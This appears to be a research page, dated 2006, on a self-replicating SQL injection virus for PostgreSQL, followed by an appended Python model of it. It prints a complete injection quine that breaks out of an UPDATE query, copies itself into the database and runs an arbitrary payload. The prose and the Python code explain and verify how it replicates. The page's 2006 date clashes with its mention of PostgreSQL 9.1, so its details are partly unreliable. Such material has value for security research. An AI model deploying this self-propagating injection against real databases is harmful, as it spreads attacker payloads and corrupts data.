
SQL Virus Using Quines for PostgreSQL


The PostgreSQL exploit (Exploit 1) is functionally the same as the MySQL version; only the differences are explained below.
%content%' WHERE TagID='%id%';

CREATE FUNCTION a() RETURNS text AS ' SELECT text ''UPDATE ContainerContents SET NewContents=''''%content%'''''''' WHERE TagID=''''''''%id%''''''''; CREATE FUNCTION a() RETURNS text AS '''''''' SELECT text '''''''''''' || quote_literal(trim (both '''''''''''''''' from quote_literal(a()))) || '''''''''''';'''''''' LANGUAGE SQL; '''' || a(); DROP FUNCTION a(); %payload%; --'';' LANGUAGE SQL;

UPDATE ContainerContents SET NewContents='%content%'' WHERE TagID=''%id%''; CREATE FUNCTION a() RETURNS text AS '' SELECT text ''' || quote_literal(trim (both '''' from quote_literal(a()))) || ''';'' LANGUAGE SQL; ' || a(); DROP FUNCTION a(); %payload%; --
Exploit 1 - PostgreSQL exploit. The three parts together are the contents of one tag; the whitespace between them is for readability only.

The first part closes the NewContents string and supplies its own WHERE clause, so the application's UPDATE still completes normally. The second part defines a() as a function that returns the text of the third part; because that text sits inside the function body, which is itself a string literal, every quote in it is written four times. The third part rebuilds the whole tag from the text returned by a(), drops the function, runs the payload and comments out the remainder of the application's query.

PostgreSQL has no user-defined session variables such as MySQL's @a, so a function, a(), is created to hold the text instead. After the virus has replicated itself the function is dropped; otherwise CREATE FUNCTION a() fails the next time the virus executes because the function already exists, and since the injected statements run as one batch, the statements after it would not run either.

Strings are handled differently on PostgreSQL. PostgreSQL escapes a quote inside a string literal by doubling it ('') rather than with the backslash escape (\') that MySQL uses. It also does not provide the concat function (that was only added in PostgreSQL 9.1); the concatenation operator || is used instead.

On PostgreSQL, the function quote_literal is used to escape strings; it is the counterpart of the QUOTE function on MySQL.
Because the text that a() returns is embedded in the body of CREATE FUNCTION, which is itself a string literal, it must be escaped twice, so every quote in it ends up quadrupled. Each call to quote_literal also wraps its result in a pair of single quotes. The pair added by the inner call is stripped off again with trim; the pair added by the outer call is kept and, together with the quotes that end the first part and start the last part, forms the doubled quotes that delimit the literal inside the function body.
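The escaping arithmetic above is easy to get wrong by one level, so here is an added example (not code from the page, nor from the project it describes) that models it offline in Python: it re-implements the two PostgreSQL string functions the exploit relies on, quote_literal and trim(both ... from ...), parses the injected statements with just enough SQL awareness to tell string literals from statement boundaries, and checks that the tag writes itself back unchanged. The vulnerable query it assumes is the one the listing implies, UPDATE ContainerContents SET NewContents='<tag>' WHERE TagID='<id>'; the helper names (read_literal, split_outside_quotes, run, build_tag, infect), the tag id and the alternative payload are its own, constructed for the check.

```python
"""Offline model of the PostgreSQL quine in Exploit 1 (added example, not
code from the page). Re-implements quote_literal() and trim(both ... from
...) and just enough SQL parsing to run the injected statements on paper.
Assumed vulnerable query (as the page's listing implies):
UPDATE ContainerContents SET NewContents='<tag>' WHERE TagID='<id>';
"""

# The two fixed pieces the virus wraps around the escaped copy of itself.
S1 = "%content%' WHERE TagID='%id%'; CREATE FUNCTION a() RETURNS text AS ' SELECT text '"
S2 = "';' LANGUAGE SQL; "

def quote_literal(s):
    """PostgreSQL quote_literal(text): double every ' and wrap in quotes."""
    assert "\\" not in s   # the real function also escapes backslashes
    return "'" + s.replace("'", "''") + "'"

def read_literal(sql, i):
    """Parse the literal at sql[i] == "'"; returns (value, index past it)."""
    out, i = [], i + 1
    while True:
        if sql[i] != "'":
            out.append(sql[i]); i += 1
        elif sql[i + 1:i + 2] == "'":          # '' inside a literal is one '
            out.append("'"); i += 2
        else:
            return "".join(out), i + 1

def split_outside_quotes(sql, sep):
    """Split on sep, skipping string literals and a trailing -- comment."""
    parts, cur, i = [], [], 0
    while i < len(sql):
        if sql[i] == "'":
            _, j = read_literal(sql, i)
            cur.append(sql[i:j]); i = j
        elif sql.startswith("--", i):
            break
        elif sql.startswith(sep, i):
            parts.append("".join(cur)); cur = []; i += len(sep)
        else:
            cur.append(sql[i]); i += 1
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]

def eval_expr(expr, funcs):
    """Evaluate the small expression grammar the exploit uses."""
    terms = split_outside_quotes(expr, "||")
    if len(terms) > 1:
        return "".join(eval_expr(t, funcs) for t in terms)
    expr = expr.strip()
    if expr.startswith("text "):                # type-prefixed literal
        expr = expr[len("text "):].strip()
    if expr.startswith("'"):
        return read_literal(expr, 0)[0]
    if expr == "a()":
        return funcs["a"]()
    if expr.startswith("quote_literal("):
        return quote_literal(eval_expr(expr[len("quote_literal("):-1], funcs))
    if expr.startswith("trim (both "):
        chars, j = read_literal(expr, len("trim (both "))
        inner = expr[j:].strip()[len("from "):-1]    # "from <expr>)"
        return eval_expr(inner, funcs).strip(chars)
    raise ValueError("unsupported expression: " + expr)

def run(query):
    """Run statement by statement; returns (NewContents written, funcs, payloads)."""
    funcs, writes, payloads = {}, [], []
    for stmt in split_outside_quotes(query, ";"):
        if stmt.startswith("UPDATE ContainerContents SET NewContents="):
            expr = stmt[len("UPDATE ContainerContents SET NewContents="):]
            writes.append(eval_expr(split_outside_quotes(expr, " WHERE ")[0], funcs))
        elif stmt.startswith("CREATE FUNCTION a() RETURNS text AS "):
            body, _ = read_literal(stmt, len("CREATE FUNCTION a() RETURNS text AS "))
            select = split_outside_quotes(body, ";")[0]
            funcs["a"] = lambda sel=select: eval_expr(sel[len("SELECT "):], funcs)
        elif stmt == "DROP FUNCTION a()":
            del funcs["a"]
        else:
            payloads.append(stmt)               # whatever fills %payload%
    return writes, funcs, payloads

def build_tag(payload="%payload%"):
    """Tag contents: S1, the twice-escaped text of a(), S2, then that text."""
    r = ("UPDATE ContainerContents SET NewContents=" + quote_literal(S1)
         + " || quote_literal(trim (both " + quote_literal("'")
         + " from quote_literal(a()))) || " + quote_literal(S2)
         + " || a(); DROP FUNCTION a(); " + payload + "; --")
    # r sits two literal levels deep, so its quotes are quadrupled here;
    # trim() at run time peels the inner level off again.
    return S1 + quote_literal(r.replace("'", "''")) + S2 + r

def infect(tag, tag_id="42"):
    """The application's UPDATE with the tag pasted in unescaped (constructed id)."""
    return run("UPDATE ContainerContents SET NewContents='" + tag
               + "' WHERE TagID='" + tag_id + "';")

# Exploit 1 as printed on the page, one entry per printed part.
EXPLOIT_1 = [
    "%content%' WHERE TagID='%id%';",
    "CREATE FUNCTION a() RETURNS text AS ' SELECT text ''UPDATE ContainerContents SET NewContents=''''%content%'''''''' WHERE TagID=''''''''%id%''''''''; CREATE FUNCTION a() RETURNS text AS '''''''' SELECT text '''''''''''' || quote_literal(trim (both '''''''''''''''' from quote_literal(a()))) || '''''''''''';'''''''' LANGUAGE SQL; '''' || a(); DROP FUNCTION a(); %payload%; --'';' LANGUAGE SQL;",
    "UPDATE ContainerContents SET NewContents='%content%'' WHERE TagID=''%id%''; CREATE FUNCTION a() RETURNS text AS '' SELECT text ''' || quote_literal(trim (both '''' from quote_literal(a()))) || ''';'' LANGUAGE SQL; ' || a(); DROP FUNCTION a(); %payload%; --",
]
```

build_tag() reproduces the three parts of the listing joined by single spaces, and infect(build_tag()) returns the two NewContents values the batch writes: the innocuous %content% first, then the complete tag again, with a() dropped afterwards. Passing a different payload to build_tag() shows why the construction survives arbitrary payloads: the payload lives inside the text that is quoted twice, so its own quotes are escaped along with everything else.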



Last modified: Thursday, 02 March 2006 21:35, CET